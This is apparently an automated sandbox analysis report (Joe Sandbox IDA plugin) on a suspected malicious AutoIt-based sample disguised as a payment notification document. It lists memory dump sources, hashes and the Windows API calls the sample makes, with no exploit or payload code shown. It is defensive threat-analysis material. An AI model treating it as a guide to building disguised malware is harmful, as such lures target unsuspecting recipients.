                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcslen
                                                                              • String ID: SysListView32
                                                                              • API String ID: 2147712094-78025650
                                                                              • Opcode ID: 4091f6cf11f61ddf7261f932291889a28397767dffac913df9eeed94e361f676
                                                                              • Instruction ID: 1d0878cbe4f299e479d267f78d83fe3d328364b0417873eb37236effa4003adb
                                                                              • Opcode Fuzzy Hash: 4091f6cf11f61ddf7261f932291889a28397767dffac913df9eeed94e361f676
                                                                              • Instruction Fuzzy Hash: 4841B472A00219ABDF219F64CC45BEA77A9FF48354F10852AF95CE7281D7719E80DB90
                                                                              APIs
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0094BCFD
                                                                              • IsMenu.USER32(00000000), ref: 0094BD1D
                                                                              • CreatePopupMenu.USER32 ref: 0094BD53
                                                                              • GetMenuItemCount.USER32(01997190), ref: 0094BDA4
                                                                              • InsertMenuItemW.USER32(01997190,?,00000001,00000030), ref: 0094BDCC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                              • String ID: 0$2
                                                                              • API String ID: 93392585-3793063076
                                                                              • Opcode ID: 28759877611d31fc32ea5161e87d57ce488fbd919cec623aea0caf94c78ba1d6
                                                                              • Instruction ID: ba3007f53e2314ba00246971bbba066a74d716c06cb4f94aba6ba1f38f157c76
                                                                              • Opcode Fuzzy Hash: 28759877611d31fc32ea5161e87d57ce488fbd919cec623aea0caf94c78ba1d6
                                                                              • Instruction Fuzzy Hash: 4451ADB0A042059BDF20CFA8D8C4FAEBBF8BF85314F144699E5559B2D0D770D945CB61
                                                                              APIs
                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 0094C913
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2457776203-404129466
                                                                              • Opcode ID: 753bc65ed854f73e721313474e12a26681213012a52e47c654dff5d20d71290b
                                                                              • Instruction ID: 046ae63edffb9cf5bd845eb527c79688382a1b9dfa0e7f07c4c2fb872752b632
                                                                              • Opcode Fuzzy Hash: 753bc65ed854f73e721313474e12a26681213012a52e47c654dff5d20d71290b
                                                                              • Instruction Fuzzy Hash: 651150B279A306BEE7046B14DD83DAE379CDF56318B10002EF500A62C2EB745E4053A4
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$LocalTime
                                                                              • String ID:
                                                                              • API String ID: 952045576-0
                                                                              • Opcode ID: 7c6516406858d943af740aa2782672d971007d286c1319abf17347d5b88b7bac
                                                                              • Instruction ID: 179d6086bdef115768d8ad02057f888e7a71903bd8d0b43763bc46c4571a934d
                                                                              • Opcode Fuzzy Hash: 7c6516406858d943af740aa2782672d971007d286c1319abf17347d5b88b7bac
                                                                              • Instruction Fuzzy Hash: 76419565C10118B9CB11EBF8C88AECFB7ACAF85710F508462F524E31A1FB34E255C7A5
                                                                              APIs
                                                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 008FF953
                                                                              • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0093F3D1
                                                                              • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0093682C,00000004,00000000,00000000), ref: 0093F454
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 1268545403-0
                                                                              • Opcode ID: 2a6223a158e03736168a09776d9157aa11085c0286079fae7b8a3ac17a56ff58
                                                                              • Instruction ID: 1ba65263f02dc769313b668341015d68cf7a71e19209ae0725908dd7f89dce2f
                                                                              • Opcode Fuzzy Hash: 2a6223a158e03736168a09776d9157aa11085c0286079fae7b8a3ac17a56ff58
                                                                              • Instruction Fuzzy Hash: 7D412831718688BAC7388B39899C73A7F95FF56314F54443CE38BD2672D6B2A880DB11
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00972D1B
                                                                              • GetDC.USER32(00000000), ref: 00972D23
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00972D2E
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00972D3A
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00972D76
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00972D87
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00975A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00972DC2
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00972DE1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              • Opcode ID: 20f5b33ff54f85bccb53dda1c6c3049bd072cbc94ed5660906f070a1765979f5
                                                                              • Instruction ID: a788378a3a4594d6f91e43b24cc000862beed55d3b20706040d133286b87aaca
                                                                              • Opcode Fuzzy Hash: 20f5b33ff54f85bccb53dda1c6c3049bd072cbc94ed5660906f070a1765979f5
                                                                              • Instruction Fuzzy Hash: 8B317F72215214BFEB214F50CC89FEB3BADEF09715F044059FE0C9A291D6759C90C7A4
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _memcmp
                                                                              • String ID:
                                                                              • API String ID: 2931989736-0
                                                                              • Opcode ID: 151ac64215b54bd698233d230dbad1fe8c7919e5e1804dfb82bdbbcab58f45f6
                                                                              • Instruction ID: bd64fa21f1438fefc0509db32ba4cdffd49c168e15fe990b3c2c7d03085d6bf7
                                                                              • Opcode Fuzzy Hash: 151ac64215b54bd698233d230dbad1fe8c7919e5e1804dfb82bdbbcab58f45f6
                                                                              • Instruction Fuzzy Hash: EA21C672640A097BD61956608E92FFA339CBFA1788F564030FD08AA683F725ED11C5A9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 0-572801152
                                                                              • Opcode ID: b30c97609ceed50eea95c569787dc0c7941b7bdd0f0facf3dfb7a92411f0b1a8
                                                                              • Instruction ID: 36aa3f599022bb9879afecbc62a5d84ac0b86a8355c7057b9fdbe3ed28537f72
                                                                              • Opcode Fuzzy Hash: b30c97609ceed50eea95c569787dc0c7941b7bdd0f0facf3dfb7a92411f0b1a8
                                                                              • Instruction Fuzzy Hash: F1D1A471A0060AAFDF10CF98C891FAEB7B9FF88344F168469E915AB281E771DD45CB50
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,?), ref: 009215CE
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00921651
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009216E4
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 009216FB
                                                                                • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00921777
                                                                              • __freea.LIBCMT ref: 009217A2
                                                                              • __freea.LIBCMT ref: 009217AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                              • String ID:
                                                                              • API String ID: 2829977744-0
                                                                              • Opcode ID: f7ac8114283f27a69f59172d3fd30e957df2fbe72829345ba5f037ac5c4042bb
                                                                              • Instruction ID: e215617854fcbb395f20b45de2674414e2bb13b04f77c8e707a7c0c34ab2e5ba
                                                                              • Opcode Fuzzy Hash: f7ac8114283f27a69f59172d3fd30e957df2fbe72829345ba5f037ac5c4042bb
                                                                              • Instruction Fuzzy Hash: 6091D672E002269EDF208E74E841EEE7BBD9FA5310F184569F805E7149D735CD90CBA0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit
                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 2610073882-625585964
                                                                              • Opcode ID: 1dd7156286c2526bb7035d4c344c156f33babfffbf34779d6a23c9e04b41c769
                                                                              • Instruction ID: b673fc7c8a87323104c8f1637fe6281ea626306de1b5a1c17b21b0294b4c4b10
                                                                              • Opcode Fuzzy Hash: 1dd7156286c2526bb7035d4c344c156f33babfffbf34779d6a23c9e04b41c769
                                                                              • Instruction Fuzzy Hash: 61917971A00219AFDF20CFA5CC89FAEBBB8EF86714F108559F515AB280D7709945CFA0
                                                                              APIs
                                                                              • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0095125C
                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00951284
                                                                              • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009512A8
                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009512D8
                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0095135F
                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009513C4
                                                                              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00951430
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                              • String ID:
                                                                              • API String ID: 2550207440-0
                                                                              • Opcode ID: 93c18ee9403dfe4f0d00bc398b39ada1288118f2b37c0c5dbfcb85f4f045a999
                                                                              • Instruction ID: bcd6e447ebadeff758e0525122711eeb6a971a84a24338d0013d19078bce2e3b
                                                                              • Opcode Fuzzy Hash: 93c18ee9403dfe4f0d00bc398b39ada1288118f2b37c0c5dbfcb85f4f045a999
                                                                              • Instruction Fuzzy Hash: EE910871900209AFDB00DFAAC885BBE77B9FF45316F104429ED50E72A1D778E949CB51
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                              • String ID:
                                                                              • API String ID: 3225163088-0
                                                                              • Opcode ID: 66f41d18b10aece1586a59e42402bf78ab60308681f0b4e375490f4680313cbf
                                                                              • Instruction ID: 7074044fe9b12928a1bc6b6b7b8b528f3f1c4c1abae41bb1d70950263cfcc530
                                                                              • Opcode Fuzzy Hash: 66f41d18b10aece1586a59e42402bf78ab60308681f0b4e375490f4680313cbf
                                                                              • Instruction Fuzzy Hash: 9D911471904219AFCB14CFA9C884AEEBBB8FF49320F148459E655F7251D378A941DBA0
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0096396B
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00963A7A
                                                                              • _wcslen.LIBCMT ref: 00963A8A
                                                                              • VariantClear.OLEAUT32(?), ref: 00963C1F
                                                                                • Part of subcall function 00950CDF: VariantInit.OLEAUT32(00000000), ref: 00950D1F
                                                                                • Part of subcall function 00950CDF: VariantCopy.OLEAUT32(?,?), ref: 00950D28
                                                                                • Part of subcall function 00950CDF: VariantClear.OLEAUT32(?), ref: 00950D34
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                              • API String ID: 4137639002-1221869570
                                                                              • Opcode ID: d263f936fe1f06884f4e9d3a54ef39ca7fae6f02da41525f4615c4b1923a3f0f
                                                                              • Instruction ID: 9cf141939b5013cdc6dc8a2cff1dc0c3e341ed1465bb191356f4f74ee8dd6c99
                                                                              • Opcode Fuzzy Hash: d263f936fe1f06884f4e9d3a54ef39ca7fae6f02da41525f4615c4b1923a3f0f
                                                                              • Instruction Fuzzy Hash: 1A9175756083459FC714EF68C48192AB7E8FF89714F14882EF88A9B351DB30EE45CB82
                                                                              APIs
                                                                                • Part of subcall function 0094000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?,?,0094035E), ref: 0094002B
                                                                                • Part of subcall function 0094000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940046
                                                                                • Part of subcall function 0094000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940054
                                                                                • Part of subcall function 0094000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?), ref: 00940064
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00964C51
                                                                              • _wcslen.LIBCMT ref: 00964D59
                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00964DCF
                                                                              • CoTaskMemFree.OLE32(?), ref: 00964DDA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 614568839-2785691316
                                                                              • Opcode ID: 6f9da9de1ed8db8b32f6d5e2625692e07bb0b1e8698285d201450b974019236c
                                                                              • Instruction ID: 4d9268a45281d0847e33837475b27b16341c4b8af4162a56bee6e92d83a6f08f
                                                                              • Opcode Fuzzy Hash: 6f9da9de1ed8db8b32f6d5e2625692e07bb0b1e8698285d201450b974019236c
                                                                              • Instruction Fuzzy Hash: 90912771D0021DAFDF15DFA4C891AEEB7B8FF48300F108169E919A7291DB34AA44CFA1
                                                                              APIs
                                                                              • GetMenu.USER32(?), ref: 00972183
                                                                              • GetMenuItemCount.USER32(00000000), ref: 009721B5
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009721DD
                                                                              • _wcslen.LIBCMT ref: 00972213
                                                                              • GetMenuItemID.USER32(?,?), ref: 0097224D
                                                                              • GetSubMenu.USER32(?,?), ref: 0097225B
                                                                                • Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
                                                                                • Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
                                                                                • Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65
                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009722E3
                                                                                • Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                              • String ID:
                                                                              • API String ID: 4196846111-0
                                                                              • Opcode ID: 9e072a0f44898685bde316419a98f42e922a079535600946e4927da0aa5b255e
                                                                              • Instruction ID: 7814c9e585fc573b7beba8976516535b18f9f0ae3fdca31a7951d4b2666367a2
                                                                              • Opcode Fuzzy Hash: 9e072a0f44898685bde316419a98f42e922a079535600946e4927da0aa5b255e
                                                                              • Instruction Fuzzy Hash: CD71A276E14205AFCB14DF68C881AAEB7F5FF88310F148459E92AEB351DB34ED418B90
                                                                              APIs
                                                                              • IsWindow.USER32(01997078), ref: 00977F37
                                                                              • IsWindowEnabled.USER32(01997078), ref: 00977F43
                                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0097801E
                                                                              • SendMessageW.USER32(01997078,000000B0,?,?), ref: 00978051
                                                                              • IsDlgButtonChecked.USER32(?,?), ref: 00978089
                                                                              • GetWindowLongW.USER32(01997078,000000EC), ref: 009780AB
                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009780C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
